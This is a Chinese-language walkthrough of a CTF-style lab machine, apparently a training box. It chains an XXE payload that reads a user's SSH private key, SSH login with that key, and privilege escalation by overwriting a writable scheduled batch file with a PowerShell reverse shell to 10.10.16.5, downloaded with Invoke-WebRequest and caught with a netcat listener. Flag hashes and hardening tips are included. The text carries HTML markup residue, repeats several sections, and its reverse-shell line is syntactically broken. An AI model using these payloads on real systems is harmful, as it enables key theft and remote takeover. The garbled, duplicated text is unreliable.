XXE注入漏洞利用与提权实战教学文档<\/h1>

1. 目标环境侦察<\/h2>

1.1 服务版本识别<\/h3>

使用Nmap扫描目标80端口服务版本：<\/p>

nmap -sC -sV 10.129.95.192 -p 80<\/span>
<\/span><\/span><\/code><\/pre>发现Apache版本为2.4.41<\/p>
1.2 网站登录凭证<\/h3>
通过测试发现有效凭证：<\/p>

用户名：admin<\/code><\/li>
密码：password<\/code><\/li>
<\/ul>
1.3 关键页面分析<\/h3>
网站顶部接受用户输入的关键字为：order<\/code><\/p>
2. XML与XXE基础<\/h2>
2.1 XML版本<\/h3>
目标系统使用的XML版本为：1.0<\/code><\/p>
2.2 XXE攻击定义<\/h3>
XXE全称：XML External Entity<\/code>（XML外部实体注入）<\/p>
3. XXE漏洞利用实战<\/h2>
3.1 工具准备<\/h3>
使用MXXE工具（已更新至1.2版本）：<\/p>
https:\/\/github.com\/MartinxMax\/MXXE
<\/span><\/span><\/code><\/pre>3.2 敏感文件获取<\/h3>

创建payload.txt文件，包含以下内容：<\/li>
<\/ol>
<?xml version="1.0"?><\/span>
<\/span><\/span><!DOCTYPE root [
<\/span><\/span><\/span><!ENTITY test SYSTEM 'file:\/\/\/c:\/Users\/daniel\/.ssh\/id_rsa'><\/span>
<\/span><\/span>]>
<\/span><\/span><order><\/span>
<\/span><\/span>    <quantity><\/span>3<\/quantity><\/span>
<\/span><\/span>    <item><\/span>&test;<\/item><\/span>
<\/span><\/span>    <address><\/span>17th Estate, CA<\/address><\/span>
<\/span><\/span><\/order><\/span>
<\/span><\/span><\/code><\/pre>
执行攻击：<\/li>
<\/ol>
python3 MXXE.py -lh 10.10.16.5 -user Daniel -server windows
<\/span><\/span><\/code><\/pre>3.3 SSH私钥利用<\/h3>

保存获取的私钥到id_rsa文件<\/li>
设置适当权限：<\/li>
<\/ol>
chmod 400<\/span> id_rsa
<\/span><\/span><\/code><\/pre>
使用私钥连接：<\/li>
<\/ol>
ssh -i id_rsa Daniel@10.129.95.192
<\/span><\/span><\/code><\/pre>4. 权限提升技术<\/h2>
4.1 发现提权机会<\/h3>
在Log-Management文件夹中发现文件：job.bat<\/code><\/p>
4.2 文件分析<\/h3>
job.bat中提到的可执行文件：wevtutil.exe<\/code><\/p>
4.3 权限检查<\/h3>
使用icacls检查job.bat权限：<\/p>
icacls job.bat
<\/span><\/span><\/code><\/pre>发现BUILTIN\Users组具有完全控制(F)权限<\/p>
4.4 计划任务检查<\/h3>
检查系统计划任务：<\/p>
schtasks
<\/span><\/span><\/code><\/pre>或使用PowerShell：<\/p>
ps
<\/span><\/span><\/code><\/pre>4.5 反向Shell构造<\/h3>
修改job.bat内容为以下PowerShell反向Shell：<\/p>
powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5', 10032); $stream = $client.GetStream(); while($true){ $data = (New-Object System.IO.StreamReader($stream)).ReadLine(); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close()"<\/span>
<\/span><\/span><\/code><\/pre>4.6 文件替换<\/h3>
使用PowerShell下载修改后的job.bat：<\/p>
Invoke-WebRequest -Uri http:<\/span>\/\/10.10.16.5\/job.bat -UseBasicParsing -OutFile job.bat
<\/span><\/span><\/code><\/pre>4.7 监听设置<\/h3>
在攻击机上设置监听：<\/p>
nc -lvnp 10032<\/span>
<\/span><\/span><\/code><\/pre>5. 获取Flag<\/h2>
5.1 用户Flag<\/h3>
type<\/span> C:\Users\Daniel\Desktop\user.txt
<\/span><\/span><\/code><\/pre>得到：032d2fc8952a8c24e39c8f0ee9918ef7<\/code><\/p>
5.2 管理员Flag<\/h3>
type<\/span> C:\/Users\/administrator\/Desktop\/root.txt
<\/span><\/span><\/code><\/pre>得到：f574a3e7650cebd8c39784299cb570f8<\/code><\/p>
6. 关键工具与命令总结<\/h2>



工具\/命令<\/th>
用途<\/th>
<\/tr>
<\/thead>


nmap -sC -sV<\/td>
服务版本扫描<\/td>
<\/tr>

MXXE.py<\/td>
XXE自动化利用工具<\/td>
<\/tr>

chmod 400<\/td>
设置SSH私钥权限<\/td>
<\/tr>

icacls<\/td>
Windows ACL查看\/修改<\/td>
<\/tr>

schtasks<\/td>
计划任务管理<\/td>
<\/tr>

wevtutil.exe<\/td>
Windows事件日志工具<\/td>
<\/tr>

Invoke-WebRequest<\/td>
PowerShell下载文件<\/td>
<\/tr>

nc -lvnp<\/td>
Netcat监听<\/td>
<\/tr>
<\/tbody>
<\/table>
7. 安全建议<\/h2>

禁用XML外部实体解析<\/li>
限制服务器文件系统访问<\/li>
定期审计计划任务权限<\/li>
避免使用弱密码<\/li>
严格控制SSH私钥权限<\/li>
监控异常进程执行<\/li>
<\/ol>

XXE注入漏洞利用与提权实战教学文档<\/h1>

1. 目标环境侦察<\/h2>

1.3 关键页面分析<\/h3>
网站顶部接受用户输入的关键字为：`order<\/code><\/p>`

2.1 XML版本<\/h3>
目标系统使用的XML版本为：`1.0<\/code><\/p>`

4. 权限提升技术<\/h2>

4.1 发现提权机会<\/h3>
在Log-Management文件夹中发现文件：`job.bat<\/code><\/p>`

5. 获取Flag<\/h2>

7. 安全建议<\/h2>

禁用XML外部实体解析<\/li>
限制服务器文件系统访问<\/li>
定期审计计划任务权限<\/li>
避免使用弱密码<\/li>
严格控制SSH私钥权限<\/li>
监控异常进程执行<\/li> <\/ol>

工具\/命令<\/th>	用途<\/th> <\/tr> <\/thead>
nmap -sC -sV<\/td>	服务版本扫描<\/td> <\/tr>
MXXE.py<\/td>	XXE自动化利用工具<\/td> <\/tr>
chmod 400<\/td>	设置SSH私钥权限<\/td> <\/tr>
icacls<\/td>	Windows ACL查看\/修改<\/td> <\/tr>
schtasks<\/td>	计划任务管理<\/td> <\/tr>
wevtutil.exe<\/td>	Windows事件日志工具<\/td> <\/tr>
Invoke-WebRequest<\/td>	PowerShell下载文件<\/td> <\/tr>
nc -lvnp<\/td>	Netcat监听<\/td> <\/tr> <\/tbody> <\/table> 7. 安全建议<\/h2> 禁用XML外部实体解析<\/li> 限制服务器文件系统访问<\/li> 定期审计计划任务权限<\/li> 避免使用弱密码<\/li> 严格控制SSH私钥权限<\/li> 监控异常进程执行<\/li> <\/ol>

XXE注入漏洞利用与提权实战教学文档<\/h1>

1. 目标环境侦察<\/h2>

1.3 关键页面分析<\/h3> 网站顶部接受用户输入的关键字为：order<\/code><\/p>

2.1 XML版本<\/h3> 目标系统使用的XML版本为：1.0<\/code><\/p>

4. 权限提升技术<\/h2>

4.1 发现提权机会<\/h3> 在Log-Management文件夹中发现文件：job.bat<\/code><\/p>

5. 获取Flag<\/h2>

7. 安全建议<\/h2> 禁用XML外部实体解析<\/li> 限制服务器文件系统访问<\/li> 定期审计计划任务权限<\/li> 避免使用弱密码<\/li> 严格控制SSH私钥权限<\/li> 监控异常进程执行<\/li> <\/ol>

1.3 关键页面分析<\/h3>
网站顶部接受用户输入的关键字为：`order<\/code><\/p>`

2.1 XML版本<\/h3>
目标系统使用的XML版本为：`1.0<\/code><\/p>`

4.1 发现提权机会<\/h3>
在Log-Management文件夹中发现文件：`job.bat<\/code><\/p>`

7. 安全建议<\/h2>

禁用XML外部实体解析<\/li>
限制服务器文件系统访问<\/li>
定期审计计划任务权限<\/li>
避免使用弱密码<\/li>
严格控制SSH私钥权限<\/li>
监控异常进程执行<\/li> <\/ol>